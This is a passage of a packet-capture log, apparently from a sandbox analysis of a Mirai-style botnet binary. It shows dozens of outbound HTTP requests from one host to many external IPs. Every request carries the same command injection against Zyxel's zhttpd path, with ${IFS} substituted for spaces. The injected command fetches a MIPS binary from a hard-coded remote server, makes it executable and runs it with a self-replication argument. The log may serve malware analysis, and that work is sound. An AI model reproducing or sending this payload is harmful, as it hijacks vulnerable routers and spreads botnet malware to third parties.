                                      Jan 14, 2024 15:50:54.484910011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6346192.168.2.145378640.100.32.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.484950066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6347192.168.2.144993674.15.59.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.484991074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6348192.168.2.1460504106.63.155.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.485034943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6349192.168.2.1447192103.215.184.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.485080957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6350192.168.2.145066423.94.34.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.485126972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6351192.168.2.144804042.36.53.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.485177994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6352192.168.2.144543484.79.71.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.485198975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6353192.168.2.144091241.61.165.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.485246897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6354192.168.2.1446742133.49.133.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.485280037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6355192.168.2.145938813.56.141.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.485342026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6356192.168.2.144688281.42.238.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.485352039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6357192.168.2.144817237.204.25.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.485409021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6358192.168.2.1436574202.10.2.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.485451937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6359192.168.2.1437902142.44.17.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.485502005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6360192.168.2.143823866.7.136.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.485554934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6361192.168.2.144696469.114.204.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.485580921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6362192.168.2.1442206151.15.131.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.485622883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6363192.168.2.14554669.120.237.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.485654116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6364192.168.2.1447918146.160.36.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.485706091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6365192.168.2.1433308141.140.55.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.485745907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6366192.168.2.1458106204.38.186.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.485795975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6367192.168.2.143685425.156.155.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.485821962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6368192.168.2.1440580172.116.237.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.485858917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6369192.168.2.1437210162.113.184.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.485910892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6370192.168.2.145957288.232.172.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.485933065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6371192.168.2.1453998147.161.80.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.485987902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6372192.168.2.14467941.73.10.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.486017942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6373192.168.2.145559267.27.155.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.486068010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6374192.168.2.1438450184.69.193.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.486113071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6375192.168.2.1460292186.201.52.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.486155033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6376192.168.2.144062499.212.9.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.486217022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6377192.168.2.145625037.143.251.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.486258984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6378192.168.2.1434118107.235.207.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.486291885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6379192.168.2.1434402111.23.27.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.486330986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6380192.168.2.145061264.167.57.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.486385107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6381192.168.2.1458986108.87.144.226443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.486413956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6382192.168.2.1452856201.88.99.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.486474991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6383192.168.2.1450790101.55.178.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.486509085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6384192.168.2.1436042202.220.103.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.486546993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6385192.168.2.1442738115.208.141.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.486582994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6386192.168.2.1434948157.60.129.53443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.486618996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6387192.168.2.1447172178.74.72.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.486675978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6388192.168.2.145505413.56.165.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.486746073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6389192.168.2.144015031.30.193.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.486769915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6390192.168.2.1458434149.121.156.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.486807108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6391192.168.2.1437016183.133.72.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.486836910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6392192.168.2.1439912162.86.37.105443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.486866951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6393192.168.2.1450246137.161.42.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.486908913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6394192.168.2.1434688220.208.80.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.486926079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6395192.168.2.145753023.54.238.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.486984015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6396192.168.2.1436730177.210.47.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.487011909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6397192.168.2.14404708.243.191.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.487052917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6398192.168.2.1449992101.211.191.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.487082958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6399192.168.2.1434108142.137.1.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.487138033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6400192.168.2.143318088.172.13.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.487206936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6401192.168.2.1449338171.251.241.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.487234116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6402192.168.2.144809876.45.106.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.487293005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6403192.168.2.1459452205.215.37.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.487309933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6404192.168.2.144867650.31.243.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.487376928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6405192.168.2.1442498134.224.22.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.487418890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6406192.168.2.1437888131.50.160.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.487468958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6407192.168.2.1454254103.150.156.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.487495899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6408192.168.2.1453532216.9.173.39443
                                      TimestampBytes transferredDirectionData
